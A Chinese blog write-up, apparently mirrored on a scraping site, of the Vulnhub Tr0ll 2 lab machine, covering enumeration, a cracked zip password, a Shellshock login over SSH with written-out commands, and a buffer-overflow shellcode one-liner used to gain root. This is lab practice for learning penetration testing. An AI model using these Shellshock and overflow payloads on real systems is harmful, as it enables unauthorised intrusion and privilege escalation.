zoukankan      html  css  js  c++  java
  • Vulnhub-靶机-Tr0ll: 2

    本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

    靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现

    地址:https://www.vulnhub.com/entry/tr0ll-2,107/

    发现目标靶机IP地址是192.168.5.141,开始使用nmap对其进行扫描

    通过-p-参数直接全端口扫描,发现扫描不出来,具体如下

    先从80端口开始,尝试访问其web端口

    查看网页源码

    得知目标存在用户名为Tr0ll的可能想非常大,先放着,尝试下目录爆破

    发现有robots.txt文件,直接访问看看

    把这个文件robots.txt下载下来 wget http://192.168.5.141/robots.txt 然后剔除反斜杠,使用dirb进行批量尝试,挖掘可用的目录

    以此访问上述4个文件,并查看其网页源码,发现这4个文件中都隐藏了相同文件名cat_the_troll.jpg的文件,依次对这些文件使用strings命令查看是否存在敏感信息,最终在如下URL发现的图片文件存在敏感信息

     

     

     将此文件夹下载下来 wget http://192.168.5.141/dont_bother/cat_the_troll.jpg

     

    根据上面提示获得存在隐藏目录y0ur_self 尝试访问看看

     

    发现是一个文件,然后里面是base64编码的内容,下载下来然后使用base64解码

    wget http://192.168.5.141/y0ur_self/answer.txt

    使用 base64 -d answer.txt > bmfx.txt  进行解码,解码之后看了看里面的内容,猜测可能是字典,想了想web应用也没有登录界面需要进行暴力破解猜测的,那很有可能是开放的21端口,我们访问下21端口试试

    发现登录ftp的时候提示用户名Tr0ll ,这也跟我前面猜测用户名是一致的,然后使用用户名和密码一样的方式去登录看看,发现是可以登录成功的,并且看到一个文件lmao.zip 将这个文件下载下来,然后使用unzip命令进行解压,发现需要密码

    使用fcrackzip进行暴力破解密码,成功破解,密码是ItCantReallyBeThisEasyRightLOL

    使用密码解压出来一个文件noob,然后查看文件类型,确认是一个密钥文件,尝试使用noob用户名去登录

    发现不能登录,网上找了下原因,发现是可以通过shellshock进行利用的,相关参考链接:https://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh

    经过测试,最终通过下面3种形式登录成功

    ssh noob@192.168.5.141 -i noob -t "() { :; }; /bin/bash"
    ssh -i noob noob@192.168.5.141 -t "() { :; }; /bin/bash"
    ssh -i noob 192.168.5.141 -l noob -t "() { :; }; /bin/bash"

    使用find命令查看特权用户信息

    find / -perm -4000 2>/dev/null

    这里是二进制题目,我不擅长哈,直接从网上找到对应的exp直接提权,如果大家有兴趣,可以看看网上的文章

    对应的exp

    ./r00t $(python -c 'print "A"*268 + "x80xfbxffxbf" + "x90"*16 + "x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1xb0x0bxcdx80"')

     

     

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    char *详细指针
    UIScrollViewA都PI得知。
    Android动画之二:View Animation
    计算机基本知识拾遗(七)页面缓存数据的同步和恢复机制页
    得到Android系统语言设置
    Harry Potter and the Prisoner of Azkaban
    zerglurker的c语言教程006——第一功能
    ExtJs迄今datefield控制设置默认值
    quick 2.23 它们的定义c++代码lua与总结的一些细节
    uva live 6190 Beautiful Spacing (二分法+dp试 基于优化的独特性质)
  • 原文地址:https://www.cnblogs.com/autopwn/p/13542310.html
Copyright © 2011-2022 走看看